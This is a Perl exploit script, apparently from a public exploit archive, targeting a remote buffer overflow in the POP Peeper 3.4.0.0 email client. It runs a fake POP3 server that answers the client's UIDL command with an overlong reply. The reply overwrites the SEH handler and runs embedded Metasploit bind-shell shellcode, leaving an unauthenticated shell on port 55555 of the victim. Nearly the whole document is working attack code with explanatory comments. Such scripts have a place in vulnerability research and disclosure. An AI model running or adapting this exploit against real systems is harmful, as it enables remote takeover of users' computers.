# Title : POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit (SEH)
# Published : 2009-02-27
# Author : Jeremy Brown
#!/usr/bin/perl
# KL0209EXP-poppeeper_uidl-bof.pl
# 02.27.2009
# Krakow Labs Development [www.krakowlabs.com]
# POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit
#
# SEH overwrite exploitation. The handler address is a pop/pop/ret inside Imap.dll,
# which ships with POP Peeper and is built without /SafeSEH, so the address does not
# depend on the Windows build as long as the DLL loads at its usual base. Special
# thanks to James Burton for help and collaboration on exploiting this bug :P.
# Tested on Windows XP SP3.
#
# rush@KL (Jeremy Brown) [rush@krakowlabs.com]
# Jayji (James Burton) [jayjiftw@gmail.com]
#
# Associated Files & Information:
# http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_uidl-bof.txt
# http://www.krakowlabs.com/dev/exp/KL0209EXP-poppeeper_uidl-bof.pl.txt
# http://www.krakowlabs.com/dev/exp/KL0209EXP-poppeeper_uidl-bof.jpg
#
# KL0209EXP-poppeeper_uidl-bof.pl
use IO::Socket;
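use strict;
use warnings;

# Both addresses are x86 little-endian DWORDs. Pack them with 'V' (explicit
# 32-bit little-endian) instead of 'l', which follows the byte order of the
# host running this script.
my $nextsehh = 0x909006EB;    # nSEH: "EB 06" = JMP +6, followed by two NOPs
my $sehh     = 0x10014E39;    # SEH: pop/pop/ret in Imap.dll (bundled with POP Peeper, no /SafeSEH)

# Win32 bind-shell shellcode (author=metasploit, port=55555, encoder=pexalphanum,
# size=709, exitfunc=thread). NOTE: a successful run leaves an unauthenticated
# shell listening on TCP/55555 on the victim -- use only on an isolated lab host.
my $sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" .
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" .
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" .
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" .
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e" .
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38" .
"\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x34\x4e\x53\x4b\x58\x4e\x47" .
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x38" .
"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x38" .
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c" .
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" .
"\x46\x4f\x4b\x53\x46\x35\x46\x32\x4a\x42\x45\x57\x45\x4e\x4b\x48" .
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x54" .
"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x58" .
"\x49\x38\x4e\x56\x46\x52\x4e\x51\x41\x36\x43\x4c\x41\x43\x4b\x4d" .
"\x46\x36\x4b\x58\x43\x54\x42\x53\x4b\x48\x42\x44\x4e\x30\x4b\x58" .
"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x54\x4a\x50\x50\x55\x4a\x46" .
"\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56" .
"\x43\x35\x48\x36\x4a\x46\x43\x43\x44\x53\x4a\x46\x47\x47\x43\x37" .
"\x44\x43\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" .
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x58\x45\x4e" .
"\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" .
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" .
"\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x55\x43\x35\x43\x35\x43\x34" .
"\x43\x55\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x49\x4d" .
"\x43\x30\x48\x36\x43\x55\x49\x38\x41\x4e\x45\x49\x4a\x46\x46\x4a" .
"\x4c\x31\x42\x47\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41" .
"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" .
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d" .
"\x4a\x36\x45\x4e\x49\x54\x48\x48\x49\x54\x47\x35\x4f\x4f\x48\x4d" .
"\x42\x55\x46\x45\x46\x55\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" .
"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x55" .
"\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x46\x48\x56\x4a\x46\x43\x36" .
"\x4d\x36\x49\x48\x45\x4e\x4c\x36\x42\x55\x49\x45\x49\x32\x4e\x4c" .
"\x49\x48\x47\x4e\x4c\x36\x46\x54\x49\x38\x44\x4e\x41\x43\x42\x4c" .
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x54\x4e\x32" .
"\x43\x39\x4d\x48\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" .
"\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f" .
"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x55\x41\x35\x4c\x36" .
"\x41\x50\x41\x55\x41\x35\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" .
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36" .
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f" .
"\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" .
"\x4a\x36\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x55\x4f\x4f\x48\x4d" .
"\x4f\x4f\x42\x4d\x5a";

# Pose as a POP3 server on the standard port. Binding a port below 1024
# normally needs elevated privileges on Unix hosts; ReuseAddr lets the script
# be re-run immediately after a previous attempt.
my $serv = IO::Socket::INET->new(
    Proto     => 'tcp',
    LocalPort => 110,
    Listen    => 1,
    Timeout   => 60,
    ReuseAddr => 1,
) or die "Error: listen(110): $!\n";

# One victim connection only; accept() gives up after the Timeout above.
my $cli = $serv->accept() or die "Error: accept(): $!\n";

my $nextseh = pack('V', $nextsehh);
my $seh     = pack('V', $sehh);
my $nop     = "\x90";

# Malicious UIDL reply: "+OK", a single "msgnum uid" line whose uid overruns
# the client's buffer, then the terminating ".". 1072 bytes of filler reach
# the SEH record; nSEH jumps over the handler address into the NOP sled and
# the shellcode. The 1072 offset is specific to POP Peeper 3.4.0.0.
my $payload = "+OK\r\n1 "
            . ("A" x 1072)
            . $nextseh
            . $seh
            . ($nop x 32)
            . $sc
            . "\r\n.\r\n";

# Minimal POP3 dialogue. Nothing the client sends is inspected; a POP3 client
# normally issues USER, PASS, STAT and UIDL in that order, and "+OK 1 100"
# (one message of 100 octets) is what makes it go on to ask for UIDL.
my $recvbuf;
$cli->send("+OK\r\n");              # greeting
$cli->recv($recvbuf, 512);          # presumably USER
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);          # presumably PASS
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);          # presumably STAT
$cli->send("+OK 1 100\r\n");
$cli->recv($recvbuf, 512);          # presumably UIDL
$cli->send($payload);               # overflowing UIDL response
close($cli);
close($serv);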